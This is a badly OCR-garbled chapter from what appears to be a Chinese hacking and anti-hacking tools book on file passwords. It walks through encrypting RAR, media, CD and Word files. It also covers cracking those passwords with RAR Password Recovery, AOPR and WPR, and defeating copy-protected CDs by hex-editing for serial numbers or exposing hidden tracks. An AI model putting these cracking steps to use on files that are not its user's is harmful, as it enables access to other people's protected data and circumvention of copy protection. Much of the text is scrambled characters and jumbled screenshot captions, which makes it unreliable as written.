式 ， 并 且 可 以 在 压缩 文件 时 设置 密码 。 用 WinRAR 加 密 文件 的 具体 操作 步骤 如 下 。 
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STEP01: 准备 要 压缩 的 文件 
新 建 [N) 
打印 (pP) 


另存 为 [S).… 压缩 妇 忻 名 &) 
常用 . rar 
| 更 新 方式 0 


| 蝴 常用 .doc 





台 添加 到 压缩 文件 (A). [ 本寺 @)... | | 添加 并 若 换 文件 7” 
压缩 文件 格式 压缩 选项 
加 OR © 加 压缩 后 是 除 源 文 件 0) 
加 创建 自 解压 格式 压缩 文件 g) 
压缩 方式 CC) 加 创建 固 实 压 缩 文件 (8) 
: 同 添加 恢复 记录 是 ) 
回 测 试 压缩 文件 上) 
加 锁定 压缩 文件 总 ) 


压缩 为 分 誉 ， 尺 小 0 





右 击 需要 压缩 并 加 密 的 文件 ,在 快捷 菜单 中 选取 " 添 ” 国 设置 压缩 文件 的 名 国 单 击 “设置 密 码 " 
加 到 压缩 文件 " 命令 。 称 及 压缩 格式 。 按钮。 


STEP03: 输入 笑 码 STEP04: 生成 加 密 的 RAR 文件 


工具 (T) ”帮助 ({H) 
电子 邮件 ”新 建文 件 去 


输入 密码 正 ) 





用 次 输入 密码 以 确 访 多 ) 

















输入 密码 以 及 单 击 “ 确 定 ” ”查看 生成 的 RAR 文 件 。 
确认 密码 。 按钮 。 


2. RAR Password Recovery 
RAR Password Recovery 软件 是 专 为 解除 RAR 压缩 文件 的 密 但 而 制作 ， 其 操作 步骤 如 下 。 


运行 RAR Password Recovery 软件 


“Open" 按钮 , 选择 需要 解除 密码 的 RAR 文件 。 








选择 破解 方式 。 











2013-11-11 10:26:8 ”Begin to or Sc pesord fe the Be: \ 迅 下 下 载 Pkmd5.rar 
2013-11-11 10:26:8B Crack success, the password is: 
2013-11-1110:26:8 Cr Crackng fintshes,. 


单 击 “start” 按 钮 ， 即 开始 破解 。 
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EA 
= 
本 会 全 对手 


8;2.2 多 媒体 文件 


Private Pix 是 一 球 功 能 强大 的 多 媒体 加 密 工 具 。 它 文 持 对 首 频 文件 或 视频 文件 进行 加 密 ， 
为 用 户 提供 了 更 全 面 的 功能 。Private Pix 提供 了 简单 易 用 的 界面 来 对 图 厂 进 行 管理 、 加 密 和 浏 
咏 。 让 用 户 在 合 看 图 片 文件 的 同时 还 能 对 图 片 进行 加 密 ， 并 且 具 有 两 种 类 型 的 加 秘方 式 。 

使 用 Private Pix 对 文件 进行 加 密 的 其 体操 作 步 又 如 下 。 

STEP01: 运行 Private Pix 软件 STEP02: 选择 是 否 注 册 


攻防 从 入 门 到 精通 

















身 Www.tropsoftcom Private Pix [tm] 
Information on How to Purchase Copyright > Tropical Software. 2000 - 2010 


Buv a Reqgistration Kev Nowl &l| rights reserved 


Demo valid unti | December 07 2013 29 Days left 


Run Private Pix in DEMD Mode 
Register | Ewit Uninstall | 


This screen dissappears when your product is registered! 





在 文本 框 中 输入 单 击 “OK"” 图 查看 软件 信息 并 填写 注 国 单 击 “Run Private 
D 令 。 按钮。 册 内 容 。 不 能 完成 注册 时 ， Pix in DEMO Mode” 
可 免费 试用 一 个 月 。 按钮 。 


STEP03: 进入 “Private Pix(tm)” 主 窗口 


| Fle Edkt View Encryption Autoplay Help 


| 宇和 名 有 拍 噩 X| 有 8 +~+ 国 和 四 有 动 枉 内 ， 
| | Encryption Type: Encrypted Fils Name: Encryption Key 


[Blowfsh Encryption "| ?| [Fast -| ?| I¥ Same as Password Chanoe KE | Suggest key | 


Easily Encrypt or 8 











| Get rid of this ad. Buy Private Pix now... 
下 | 绩 Home Page | 加 List view | 汶 Thumbnail View | 作 Autoplay|| 者 Settings| 寺 Help | 


外- 县 Administrator | 下 


时 计算 机 | 
由 .人 网 络 由 
由 . 畏 控制 面板 | [| 
一 = - 四 一 一 | ry 如 po pp 

银 民 1 YA 是 忆 三民 | 闪 如 


二 
| 
5 


Ee 


Private Pix™ is a privacy and security tool that gives the user a Way 
to encrypt private files and then view them while they are still 
encrypted! Use it to pllotect your video, audio, and image files. It 
even helps keep media files organized! View files one-by-one or use 














the Autoplay mode. 

“3 List View 

< Tumbnail View 

3 Autoplay 

“3 Settings 

3 user Manual 

Private Pix™. Th purchase please visit www.tropsoft.con 

Copyright © Tropical Software, All rights reserved. | 一 

Tropical software| | Autoplay Off-2s 4 
Private Pix 主 窗口 主要 由 显示 窗口 和 控制 留 选择 “Settings” 选 项 卡 , 设置 密 钥 。 如 果 不 
口 两 部 分 组 成 ， 在 显示 窗口 中 选择 要 加 密 设置 密 钥 ， 则 使 用 默认 密 钥 。 


的 多 媒体 文件 。 
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< 


密码 攻防 


STEP04: 打开 “Settings” 选 项 卡 


三 Private Pix (tm) 


Me | Fie Edk View Encryption Autoplay Help 
人 绊 | 负 上 几 铅 所 X| 田 目 |@ -一男 和 和 国 本 了 ?去 . 
eo Type: Enenpted fi Nome File Name: Encryption Key 


Blowfish [BlowfishEncryption =| ? fw Same as Password Suggest Key | esc| 


由 





Beef Up Your 


二 名) PPTV 视 频 “i 
| | SS | Power! 


| 申 国 文档 
| ea 人 窗 Home Page | 性 List View | 洋 Thumbnai View | 加 Autopby | 他 Settings | 人 Help | 
医 由 "gi 月 本 Explanation 
网 系 隆 组 - Place the mouse cursor over a setting to display the relevant explanation 
| 由 -县 ssn 1 1all = nas 
| 申 - 醒 计算 机 Thumbnai Size 
| 人 网 络 Unencrypted Back Color 
由 | 控制 面板 Encrypted Back Color 
! TAI 点 uto Load Thumbnails 
































Auto Encryp 
Fiename Encrypt Key 
Enable Hide In Picture Support 
Enable Hide In MP3 Support 
Shred when deleting 
Hide In Picture and Music Settings 
Encrypted File Name Maintain Dra Filename 
Auto Chose Picture /MP3 
Folder for media files 


Window Title 

Change Password 

Bsk Password At Start 

Slways ask folder for copy/move 
Folder for copy/move 

Start on Home Page 

misnla She 














Autopby Off -2s 





从 “Encryption Type” 下 拉 列 表 框 中 单 击 “Filename Encrypt Key” 选 项 右 侧 的 密 
选择 一 种 文件 加 密 类 型 。 码 处， 会 出 现 一 个 回 按钮 ， 单 击 此 按钮 。 


STEP05: 输入 笑 码 STEP06: 修改 禹 码 


Enter Password Change Password 


Enter New Password [dom't forget it] 


456789 


Cancel ] 





输入 之 前 设置 的 密码 并 单 击 “OK” 按 钮 。 输入 新 密码 并 单 击 “OK” 按 钮 。 
STEPO7: 窗 码 修改 成 功 





单 击 “ 确 定 ” 按 钮 。 
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py > 
杀 打 攻防 从 入 门 到 精通 
小 全 人 人 他 


STEP08: 改变 管理 密码 


码 Private Pix (tm) 





File Edt View Encryption Autoplay Help 
仓 | 且 力 全 所 XX| 国 下 | 人 i- + 国 知 | 辣 | 动 三 |? 队 
Encryption Type: Encrypted File Name: Encryption Key 


Blowfish Encryption 下 贺 Fast | ?| I¥ Same as Password Suggest Key | esc| 


| | 9 本 Beef UP Your 
ee _ -人 HE， Power! 


由 -国文 
er ee 合 Home Page | 村 List View | 党 Thumbnai View | 国 Autopby Help | 
网 家庭 组 

由 -县 ssn 

-加 计算 机 Thumbnail Size 

| th 网 络 Unencrypted Back Color 

由 . 国 控制 面板 Encrypted Back Color 

| TARIANRI Auto Load Thumbnails 














Explanation 
Place the mouse cursor over a setting to display the relevant explanation 





Auto Encrypt 
Fiename Encrypt Key 
Enable Hide In Picture Support 
Enable Hide In MP3 Support 
Shred when deleting 
Hide In Picture and Music Settings 
Encrypted File Name Maintain Drg Filename 
Auto Chose Picture / MP3 Yes 
Folder for media files Cc:\ 


gdministiation Settings 


Window Title Private Pix (tm) 


Ask Password at Start 

Always ask folder for copy/move 

Folder for copy/move 

Start on Home Page 

Nisnlan Shie Nefault 








在 “Administration Settings” 栏 目 中 单 击 “Change Password” 选项 右 侧 的 密码 处 ， 会 出 现 一 
[J 按钮 ， 单 击 此 按钮 。 
STEP09: 输入 密码 STEP10: 输入 新 窗 码 


Enter Passweord 











Enter wour current password first: 





输入 之 前 设置 的 密码 并 单 击 “OK” 按 钮 。 输入 新 密码 并 单 击 “OK” 按钮 。 


DS 


STEP11: 密码 修改 成 功 





单 击 “ 确 定 ” 按 钮 。 
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STEP12: 返回 “Private Pix(tm)” 主 窗口 ”STEP13: 加 密 成 功 





ton Autopay 
CEE 图 | 和 
Enctyption Encoypl 


2 ee Ra Suogest Key 














主 朋 版 
Home Page | 访 View 
Externat 
Fiie 
> AS 国 


ICense.key SSS.exe 


Eternal 
File 





在 主 窗口 左 侧 选择 单 击 工具 栏 中 的 ”可 以 看 出 ， 加 密 后 的 文件 由 原来 的 绿色 变 成 了 红色 。 
要 加 密 的 文件 。 加 密 按钮 外 。 


STEP14: 解密 文件 


EE Private Pix (tm) 
View Encyption Autoply Help 
= 区 XX | 用 ca 
Enctyption Type: yoted Fle N Ercypbon Key 


[BlowishEncyption 了 ?| Fa BS | | Same asPassword 





选择 要 解密 的 文件 。 





sssama 84 版 本 
pcAnywhere3987 





单 击 工具 栏 中 的 解密 按钮 回 , 被 加 密 的 文件 
就 恢复 原状 了 。 








8:2.3 ”光盘 
将 数据 刻录 在 光盘 上 的 传统 方式 ， 用 于 备份 一 些 普通 的 资料 还 可 以 ， 但 对 于 备份 一 些 








重要 数据 了 驶 存在 危险 了 ， 里 面 的 数据 很 有 可 能 被 其 他 人 非法 获取 。 由 于 光盘 存 取 数 据 和 材 
料 的 特殊 性 ， 对 光盘 进行 加 密 也 成 了 一 个 问题 。 

1. 使 用 CD-Protector 软件 加 密 光 盘 

CD-Protector 是 一 个 简单 易 用 的 光盘 加 密 软 件 ， 经 它 加 密 后 ， 即 使 把 所 有 文件 复 
制 到 便 稚 上 也 仍然 不 四 CD-Protector 加 密 时 所 使 用 到 的 相关 软件 有 Nero， 加 窗 
原理 是 在 可 执行 文件 上 加 一 个 外 壳 ， 该 外 索 会 判断 所 运行 苍 盘 上 有 没有 加 密 后 所 产生 
的 相对 应 的 音频 轨道 ， 知 有 则 运行 ， 奋 没有 则 会 拒绝 运行 。CD-Protector 加 密 时 不 用 
修改 Cue 文件 ， 不 用 交 巷 写 入 坏 轨 道 ， 由 于 使 用 了 Nero 刻录 软件 ， 因 此 对 刻录 机 要 
求 不 局。 

使 用 CD-Protector 加 密 光 盘 的 具体 操作 步骤 如 下 。 
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黑客 


全 人 人 他 
STEP01: 运行 “CDProt3.exe” 应 用 程序 





As A :Qe 


二 1 人 二 (人 


Eilealkolenecnr pe: BiisedmiMessdges 


‘phanktomlran I = | = 


[eg 1 六] 
= 


Fere)e 300. 
' Fh | 蕉 udez 
ml se ns) ed 
Filaltolencer pe BuskdniMessdges 
| | 


‘phankonm Tiax direckEor = Keys 


= 
ye A= yr ae ea 
~ ma RE 
mi A ~ : 
ACLECEPT! We | 
Te | 
BD > | 
~ |e ee ~ | 
” - ~ em 
一 一 一 一 一 一 一 
We -A Pp 
mr 


STEP03: 运行 Nero 主 程 序 





音乐 CD 选项 | 刻录 


^ | | “CDA 文 件 第 略 [H]: 


视 硬盘 而 定 (站 i 认 值 ) E 


驱动 器 [5] 


设备 名 称 速度 


读 取 速度 [G]: "| 














音频 读 取 速度 ; 

园 ET 口 
高 级 

腹 除 音频 轨道 未 尾 的 无 声 片断 四 

















选择 “音乐 光盘 ”， 在 “音乐 CD 选项 ”中 勾 选 “ 
“删除 音频 


刻录 之 前 在 硬盘 驱动 器 上 缓存 轨道 ”和 
轨道 末尾 的 无 声 片段 ” 复 选 框 。 


把 用 CD-Protector 加 密 











攻防 从 入 门 到 精通 


单 击 “File to encrypt” 文 本 框 后 的 图 按钮 ， 选 
择 要 加 密 的 文件 ; 在 “Custom Message” 四 
中 输入 出 错时 的 提示 信息 (也 可 不 填 ) ; 单 击 “'P 
antom Trax directory” 文本 框 后 的 国 按钮 , 选择 
文件 输出 时 的 目录 ; 在 “Encryption Key” 文本 框 中 
输入 一 位 00~FF 之 间 的 十 六 进 制 的 数字 。 不 同 的 十 
六 位 进 制 数字 代表 产生 不 同 的 特殊 加 密 轨 道 ， 共 
有 256 种 。 


在 设置 完成 之 后 ， 可 看 到 “ACCEPT” 按钮 变 成 了 
红色 。 单 击 红色 的 “ACCEPT” 按 钮 ， 即 开始 加 密 
文件 。 加 密 完成 之 后 ， 单 击 “OK” 按钮 即 可 。 


STEPR045 刘 永 设置 











加 确定 最 大 速度 品 
站 模拟 虽 ] 




















在 “刻录 ”选项 卡 中 多 图 单 击 “新建 ” 按 
选 " 写 入 ” 复 选 框 ， 取 消 义 。 钮 ,新建 音乐 光盘 刻 
选 “结束 光盘 ” 复 选 框 。 ” 录 任 务 


过 的 首 频 文件 ， 拖 放 到 刻录 首 轨 的 窗口 并 刻录 完成 后 ， 还 需要 再 执 


行 一 届 刻 录 设 置 ， 主 要 是 为 了 用 这 个 方法 对 同一 个 音频 文件 刻录 两 次 。 在 Nero 中 再 新 建 一 个 
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只 读 光 盘 的 任务 ， 在 “多 记录 ”选项 卡 中 勾 选 “ 开 记 多 记录 光碟” 复 选 框 ， 其 他 选项 可 根据 和 需 
要 进行 相应 的 设置 。 完 成 上 述 设置 之 后 ， 单 击 “ 新 建 ” 按 钮 ， 把 用 CD-Protector 加 密 的 《〈《 除 音 
频 文件 外 ) 文件 都 拖 放 到 数据 刻录 的 窗口 并 开始 刻录 ， 刻 录 的 选项 和 刻录 首 轨 相同 。 
此 时 ， 束 可 以 看 到 同一 个 普 频 文件 再 次 刻录 后 的 结果 是 不 同 的 。 使 用 CD-Protector 加 
密 过 的 光盘 放 进 光驱 里 ， 看 到 文件 是 可 运行 的 ， 但 复制 到 目 己 的 便 极 时 束 不 能 运行 了 。 
CD-Protector 加 蜜 的 光盘 是 由 两 条 音 轨 和 一 条 数据 轨道 共同 组 成 的 ,数据 轨道 中 被 加 密 的 可 
执行 文件 ， 在 运行 时 将 会 读 取 光 和 一 上 的 音 轨 ， 只 有 相对 应 才 会 继续 运行 。 
2. 破解 加 密 光 盘 
如 今 市 面 上 有 很 多 加 和 密 光 盘 是 以 特殊 形式 刻录 的 ， 将 它 放 入 光驱 后 ， 就 会 出 现 一 个 软件 
的 安 猜 画面 要 求 输入 序列 号 , 如 果 友 列 写 正人 确 束 会 出 现 一 个 文件 浏览 窗口 , 错误 则 跳 回 时 面 。 
如 果 用 户 从 资源 浏览 占 中 所 观看 的 光盘 文件 ， 则 看 到 的 束 是 一 些 图 片 之 类 的 文件 ， 想 找 的 文 
件 却 怎么 也 看 不 到 。 这 时 就 需要 对 光盘 进行 解密 了 , 下 面 介 绍 几 种 第 用 的 破解 加 密 光 盘 方 法 。 
(1) 用 UltraEdit 等 十 六 进 制 编辑 器 直接 找到 序列 号 
运行 UltraEdit 编辑 器 打开 光盘 根 目 录 下 的 SETUPEXE 文件 之 后 , 选择“ 搜索” 一“ 查 
找 ” 采 单 命令 ， 即 可 弹出 “查找 ”对 话 框 。 在 “查找 什么 ” 栏 的 “请 输入 序列 写 ” 文 本 框 
中 输入 序列 号 之 后 ， 勾 选 “ 得 找 ASCI 字符 ” 复 选 枉 ， 在 “请 输入 序列 号 ”后 面 显 示 的 数 
学 就 是 序列 与 了。 
(2) 用 ISOBuster 等 光 栓 刻录 软件 直接 浏览 光盘 上 的 隐藏 文件 
打开 ISOBuster 光盘 歼 录 软件 之 后 ， 选 择 加 密 盘 所 在 的 光 张 ， 单 击 选择 栏 劳 边 的 “ 刷 
新 ”按钮 ， 即 开始 谈 取 光驱 中 的 文件 ， 这 时 会 发 现在 左边 的 文件 浏览 框 中 多 了 一 个 文件 夹 ， 
那里 面 就 是 要 找 的 文件 ， 可 以 直接 运行 和 复制 这 些 文件 。 
(3) 用 虚拟 光驱 软件 和 十 六 进 制 编辑 颖 
@ 用 虚拟 光驱 软件 把 加 蜜 光盘 做 成 虚拟 光盘 文件 ， 进 行 到 1% 时 终止 虚拟 光驱 程序 
运行 。 
@ 用 十 六 进 制 编辑 占 打 开 只 进行 了 1% 的 光盘 文件 ， 在 编辑 窗口 中 查找 任意 看 得 见 的 
文件 夹 或 文件 名 ， 在 该 位 置 的 上 面 或 下 面 ， 束 可 以 看 到 隐 攻 的 文件 夹 或 文件 名 了 。 
@ 在 MS-DOS 模式 下 使 用 CD 命令 进行 查看 目录 ， 再 使 用 DIR 命令 就 可 以 看 到 想 找 
的 文件 ， 并 对 其 进行 运行 和 复制 了 。 
(4) 利用 File Monitor 对 付 隐 茂 目 录 的 加 密 光 盘 
File Monitor 是 纯 “ 绿 色 ” 免 费 软件 ， 可 监视 系统 中 指定 文件 运行 状况 ， 如 指定 文件 打 
开 了 哪个 文件 ， 关 闭 了 哪个 文件 ， 对 哪个 文件 进行 了 数据 读 取 等 。 通 过 它 可 以 指定 监控 的 
文件 有 任何 读 、 写 、 打 开 其 他 文件 的 操作 都 能 被 它 监 视 下 来 ， 并 提供 完整 的 报告 信息 。 使 
用 它 的 这 个 功能 可 以 来 监视 加 密 光 盘 中 的 文件 运行 情况 ， 从 而 得 到 想 要 的 东西 。 


































































































8.2:4 ”Word 文件 


大 多 数 文档 编辑 都 是 在 Office 中 完成 的 , 这 就 会 涉及 一 些 文件 安全 问题 , 所 以 对 Office 
文件 进行 加 密 束 显得 非常 必要 了 。 

Microsoft Word 2013 在 提供 加 蜜 文 档 的 同时 ， 还 提供 保护 文档 功能 。 在 本 节 将 介绍 对 
Word 文档 进行 加 密 ， 以 防 他 人 进行 筑 探 与 修改 。 
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到 > 





FF 天 一 


售 人 他 他 


1. 使 用 强制 保护 功能 





攻防 从 入 门 到 精通 


Microsoft Word 2013 目 带 的 强制 保护 功能 , 可 以 帮助 用 户 保 护 目 己 的 Word 文档 不 被 修 


改 。 其 体 的 操作 步 又 如 下 。 
STEP01: 打开 要 加 密 的 Word 文件 


《 反 黑 风暴 一 一 黑帮 与 反 黑 工具 使 用 详解 》 麻 页 doc [ 莹 容 模式 ] - Microsoft Word 
阅 。 视图 。 加 载 项 
箱 繁 转 简 和 加 包 癌 下 = 局 四 wwe - a 
繁 入 轩 委 ee 国 3 全 83- 四 下 -各 Q 
pe 条 下 一条 加 直 批 主 修订 比 绞 ”阻止 作者 
加 市况 定格 ~ 。 





项 卡 ， 然 后 单 击 “限制 编辑 按钮。 


选择 “审阅 ” 选 
STEP03: 司 动 强制 保护 


应 页 doc [车 窑 模式 ] - Microsoft Word 


名 六 国 驴 革 有 4 - 月 上 -条 和 
和 上 和 下 -条 2 Ea 一 吕 = 吧 下 -条 忆 EF 
修订 而 更 改 kt 页 保护 


前 言 - 


当 结 束 了 白 日 喧 器 ， 第 华 的 才 市 像 个 玩 累 了 的 孩子 慢 慢 安 静 了 下 来 ， 在 静 京 得 邻 人 
室 息 的 黑夜 里 ， 某 个 都 市 的 角 藻 ,微弱 的 光亮 笼 旱 着 一 个 不 大 的 房间 ， 黑 暗中 ， 显 示 导 
; 一 个 人 , 一 侣 笔记本， Ee ae 


， 0 问 处 的 服务 器 ,， 依 
中 , ”一 词 具有 一 定 的 和 入 性 ， 其 定义 续 转折 了 反 社 人 的 寺 复 机 
。 同 在 媒体 故 所 描述 的 那样 ， 现 黑 吉 试 


工具 ， 对 一 些 庆 于 防范 的 电 及 作出 攻击 并 并 在 受 侵入 的 电脑 时 为所欲为 
、 、 硬 盘 变 作 一 团 空白 之 时 ,再 想 亡羊补牢 ， 却 为 时 已 晓 。* 





果 
生活 gr he te 他 们 将 众多 强大 的 工具 组 合 
i， 还 可 the 并 保 





启动 强制 | 保护 按钮。 


单 击 “是 


STEP05: 取消 保护 


《 反 黑 风 居 一 一 黑 吉 与 反 黑 工 具 使 用 洋 解 》 座 页 doc [ 薄 容 模式 ] - Microsof Word 


| 呈 款 可 次 a 有 区 二 
世 问 测 时 示 可 蝙 久 的 区 域 


mee 大 的 房间 ， 轩 员 中 ， 显示 屏 
芒 。 一 台 笔记 本 ， 一 杯 热 了 又 凉 、 凉 了 又 热 的 咖 p 非 ， 


全 过 程 。 本 和 得 基 了 黑客 必 
、QQ 随 天 工具 、 注 入 工具 、 远 程控 制 工具 、 ce 
用 上、 网 六 与 风电 攻 防 工具 、 本 码 路 防 工具 、 网 络 代理 与 追踪 工具 、 局 域 网 黑客 工具 


单 击 “ 停 止 保护 ”按钮 。 


2. 使 用 “ 冲 规 选项 ”进行 加 密 








STEP02: 查看 “限制 格式 和 编辑 ”窗口 


am 和 人 记 国 EE 
新 建 批注 


期 除 上 一 条 下 一 条 旦 示 批 注 


笋 简 加 钼 
从 简 肾 转换 
中 文 简 繁 转换 批注 修订 





当 结束 了 白 日 喧 可 ， 葡 华 的 者 市 像 个 玩 累 了 的 孩子 慢 慢 安 租 了 下 来 ， 在 下 京 得 令 人 
室 息 的 黑夜 里 ， 某 个 都 市 的 角 活 ， 微 弱 的 光亮 笼 重 看 一 个 不 大 的 房间 ， 黑 玉 中 ， 显 示 屏 


勾 选 “ 仅 介 许 在 文档 中 进行 此 
STEP04: ”密码 保护 


启动 强制 保护 
保护 方法 
名 密码 
[有 加 这 。 亚 襄 用 户 可 能 会 篇 名 文件 和 测 除 记 码 .) 
新 密码 可 先 )(E): | 
确认 新 密码 (BP): |“ | 


选中 “密码” 单 选 按 钮 并 输入 密码 ， 单 击 “ 确 定 ” 按 
钮 。 启 用 保护 后 不 能 对 Word 文 档 进 行 修改 。 


STEP06: 打开 “取消 保护 文档 ”对 话 框 




















在 “密码 ”文本 框 中 输入 刚 设置 的 密码 ， 单 击 “ 确 
定 " 按钮 ， 即 取消 保护 对 该 Word 文 档 进行 编辑 操作 。 


在 Microsoft Word 2013 的 “和 销 规 选项 ”中 ， 不 仅 可 以 设置 打开 Word 文档 密码 ， 还 可 


以 设置 修改 Word 文档 密码， 这 样 Word 文档 可 以 具 
使 用 “第 规 选 项 ”加 密 Word 文档 的 具体 操作 步 
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有 双重 保护 作用 。 
又 如 下 。 


密码 攻防 


STEP01: 打开 Word 2013 STEP02: 打开 “信息 ”窗口 


《 反 蛙 风景 -一 一 黑客 与 反 时 工具 使 用 详 租 》 庚 页 .doc [ 莹 容 模式 ] - Microsq 《 反 是 风 且 一 一 宇 客 与 反 旦 工具 使 用 详解 》 库 页 .doc 苹 客 模式 ] - Microsoft Word 
引用 邮件 审阅 。 视图 加 就 顺 


加 更 新 绽 入 法 亲 典 ”条 繁 转 简 L 回国 辐 匡 sse a 辽 息 信息 
语言 


每 新 建 批 注 涤 除 上 一 条 下 一 条 显示 批注 


和 他 入 转 汉 - ” 3 《 反 导 风暴 一 居 宫 与 反照 工具 合用 详解 》 记 翌 页 


语言 中 文 简 繁 转换 批 主 ee E: > 2014 选 是 。 王 叶 选 题 申 《反思 风 学 一 一 因 客 与 反 使 用 详解 》 


全 ee 
就 。 与 B 版 本 的 fce 一 起 使 用 时 , 基 些 新 功能 被 禁用 ,以 防止 出现 问题 ， 转换 此 文件 棕 
转 欣 。 | 启用 这 些 功能 , 但 可 能 会 导 到 布局 更 改 。 





保护 文档 
控制 其 他 人 可以 对 此 文 簿 疡 售 的 更 改 类 型， 


前 言 
当 结 束 了 白 日 嘲 甘 , 繁华 的 都 市 像 个 玩 累 了 人 吉 
在 发 布 此 文件 之 前 ， 请 注意 其 包含 以 下 内 容 : 
四 ”文档 属性 和 作者 的 姓名 





四 ”以 隐 坪 文字 为 格式 的 字符 
天 才 到 恶意 病毒 的 编写 者 。 因 此 ， 如 同 在 媒体 故 人 sa 


单 击 “ 文 件 ” 菜 单项 。 单 击 “另存 为 ”选项 。 
STEP03: 打开 “为 存 为 ”对 话 框 STEP04: 打开 “常规 选项 ”对 话 框 


团 另存 为 坟 
OO- 几 < 《 反 时 风景- 黑客 与 反 时 工具 使 用 详 .，， 新 建文 件 夫 

















组 织 > 。 新建 文件 :~ @ 
小 音乐 ^ 名 称 修改 日 期 关 型 大 小 
网 家 庭 组 没有 与 搜索 冬 件 匹配 的 项 。 























加 建议 以 只 读 方 成 打开 文档 (E) 
| 
| 宏 安 全 性 
| 3 一 
亩 萱 空 全 级 别 以 打开 可 能 包含 定 俩 竺 的 文件 ,并 指定 可 信任 的 害 创 建 者 姓 衬 。 
| 
| (a ord 97-2003 文档 (dod) 
| 作者 : Wuxinhua 标记 : 添加 标记 
站 保存 缩 略图 
< 隐藏 文件 夹 

















国 设置 保存 单 击 " 工 具 ” 按钮， 在 ” 国 分 别 在 “打开 文档 时 的 密码 " 单 击 “ 确 
位 置 和 文件 下 拉 菜 单 中 选择 “常规 选 ”文本 框 和 “修改 文档 时 的 密码 ” ”” 定 ” 按 钮 。 
名 称 。 项 ”选项 。 文本 框 中 输入 相应 的 密码 。 


STEP05: 再 次 输入 打开 文件 时 的 密码 STEP06: 再 次 输入 修改 文件 时 的 密码 














设置 和 修改 权限 密 耕 不 呈 安 全 功能 。 使 用 此 功能 ,能 
时 此 交 档 进行 识 编 辑 ， 但 不 能 为 其 加 密 ， 因 而 六 章 用 





输入 设置 的 打 国 单 击 “ 确 定 ” 国 输入 设置 的 ” 辆 单 击 “ 确 定 ” 按钮。 返回 “ 另 
开 文 件 密码 。 按钮 。 修改 文件 密码 。 存 为 "对话 框 , 单 击 “保存 ” 按钮 。 
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pT 
STEP07: 再 次 打开 该 Word 文档 STEP08: 输入 修改 文件 所 需 的 客 码 


请 键入 打开 芯 件 所 需 的 密码 "《 反 黑 风 暴 一 一 黑客 与 反 黑 工 具 使 用 详解 }》,doc" 


由 wuxinhua 保存 
Es 二 三 
\ 一 一 黑客 与 反 黑 工具 使 用 请 召 入 修改 文件 所 雪 的 才 码 ， 知 则 以 只 读 方式 打开 


密 苔 (PpP) ， 























在 “密码 ”对 话 框 中 输 ” 国 单 击 “ 确 定 " 输入 修改 文件 所 。 国 单 击 “ 确 定 "按钮 ， 打 
入 打开 文件 所 需 的 密码 。 按钮 。 所 需 lL 密码 。 开 已 加 密 的 Word 文 档 。 
3. 使 用 AOPR 解密 Word 文档 


AOPR (Advanced Office Paso Recovery) 是 一 个 密码 恢复 软件 ， 利 用 该 工具 可 以 
恢复 Microsoft Office 文档 的 密码 ， 它 还 文 持 非 天 文学 符 。 
使 用 AOPR 解密 Word 文档 的 具体 操作 上 又 如 下 。 


STEP01: 打开 AOPR 主 窗口 四 打开 文件 
图 Advanced Office Password Recovery Professional Edition - 无 标量 cds 


文件 恢复 因 符 网 ”VBA 后 门 语言 帮助 








2014/8/29 12:47 Microsoft Word ..。 


[项 暴力 | 字典 Ta [RS [| 
针对 强加 密 文档 的 破解 类 型 
合影 力 破解 《尝试 所 有 可 能 的 组 合 》 
全 摘 码 式 最 力 破解 《 若 已 获知 部 分 密码 符号 ) 
加 字典 破解 《推荐 ) 
日 志 窗口 
日 期 , 时 间 事件 
2014/9/1 10:48:15 AOPR 5.03 Professional Editio 


(3) 2014/9/1 10:48:15 此 操作 系统 版 本 : Windows 7 [6,1,7601] Service Pack 1 
(i 2014/9/1 10:48:15 CPU: 2, NVidia CUDA: 0, AT CAL: 0 

















站- 








当前 密码 : 
进度 指示 器 

















供 家 庭 及 商业 用 户 的 授权 ( 单机 ) 
Advanced Office Password Recovery Professional Eqdition, 版 本 5.03. Copyrnight ?1999-2010 ElcomSoft Co, Ltd CO 一 | 
ye 按钮 。 
STEP03: ”预备 破解 STEP04: 解 黎 完成 
加 Advanced Office Password Recoveny | Professional Edition - 无 标题 (= | ~ ls Word 密码 已 被 恢复 | © ls) 


文件 恢复 ”因特网 VBA 后 门 语言 帮助 











豆 - [IM > 淘 
打开 文件 . Ms 通行 证 。” MS outook 。 V6A 后 站 开始 于 Word 写 保 护 密码 : 
恢复 ”| 最 力 | 字典 | 选项 [系统 信息 | 密码 绥 存 Word 亦 档 保护 密码 : 

针对 强加 密 文档 的 破解 类 型 Word VBA 密码 : 





暴力 破解 (尝试 所 有 可 能 的 组 合 ) | 
摘 码 式 暴力 破解 (车 已 获知 部 分 密码 符号 ，) | 
人 @ 字典 破解 (推荐 ) 
文件 名 称 : 





zol4 议 项 正 叶 迁 是 撒旦 客 \ 岳 归 风 景 -一 -时 客 与 后 因 - 


无 法 立即 恢复 此 文件 的 文件 打开 密码 。 如 需 恢复 此 密码 您 必须 使 用 某 种 破解 方 
式 ， 按 下 [确定 ] 按钮 ， 选 择 您 所 需 的 选 顺 ， 再 按 下 [开始 ] 按钮 即 可 开始 恢复 。 


预备 破 冲 X 
正在 执行 预备 破解 … 




















1. 正在 检查 已 找到 的 密码 … 
2, 正在 检查 窗 码 组 存 … 
3. 于 










































供 家 庭 及 商业 用 目的 授权 (单机 ) 
Advanced Office Password Recovery Professional Edition, 版 本 5.03. Copyright ?1999-2010 ElcomSoft Co. Ltd 


查看 破解 进度 。 查看 解密 出 的 各 种 密码 。 
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4. 使 用 WPR 解密 Word 文档 

WPR (Word Password Recovery) 是 一 球 专 门 用 于 对 Word 文档 进行 解密 的 工具 。 用 户 
可 以 使 用 该 软件 设置 不 同 的 解密 方式 ， 从 而 提高 解密 的 针对 性 ， 加 快 解 密 速 度 。 

用 WPR 解密 Word 文档 的 基体 操作 步骤 如 下 。 


STEP01: 运行 WPR STEP02: 查看 提示 信息 


WD Word Password Recovery Master Information 


Fle Help 





(D To remove the “open” password the pro 人 an 


should connect to the Rixler Software Server, 
find the decrvyption key and decrypt the 
document content. Tf You are not cormected to 


Word document name 


加 D: eemsaraskac 一 | 加 | 





In order to find the decrvyption kev the program 
sends to the Rixler Software Server onlvy a few 
bytes of the document header. If you have a 

Firewall, please allow the Internet connection 


Word document hp 


“Dpen” passwoprd: | | Rnove | 
EE- | ohe> | 
"Frotection” a ES 


[Donlt show this window 所 人 





单 击 男 图 标 ， 选 择 需 。 国 单 击 "Remove 单 击 “OK” 按钮 。 


要 解密 的 Word 文 档 。 按钮 。 
STEP03: 正在 解密 STEP04: 成 功 解密 


Word Password Recovery Master 


Status lecrvyptine document. Flease walt... 





